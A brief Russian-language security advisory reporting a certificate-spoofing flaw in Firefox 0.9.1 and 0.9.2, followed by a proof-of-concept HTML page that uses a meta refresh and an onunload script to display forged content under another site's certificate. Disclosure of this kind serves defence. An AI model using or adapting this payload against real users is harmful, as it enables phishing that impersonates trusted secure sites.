Программа: Firefox 0.9.1, 0.9.2 

Уязвимость подделки сертификатов обнаружена в Mozilla Firefox. Удаленный Web сервер может подделать сертификат другого сайта.
Удаленный пользователь может создать специально обработанный HTML, который отобразит Web страницу с сертификатом другого произвольного безопасного Web сайта.

Пример: 

< HTML>
< HEAD>
< TITLE>Spoofer< /TITLE>
< META HTTP-EQUIV=»REFRESH» CONTENT=»0;URL=https://www.example.com»>
< /HEAD>
< BODY 
onunload=»
document.close();
document.writeln(‘ < body onload=document.close();break;>
< h3>It is Great to Use example’s Cert!’);
document.close();
window.location.reload();
«>
< /body>

Оставить мнение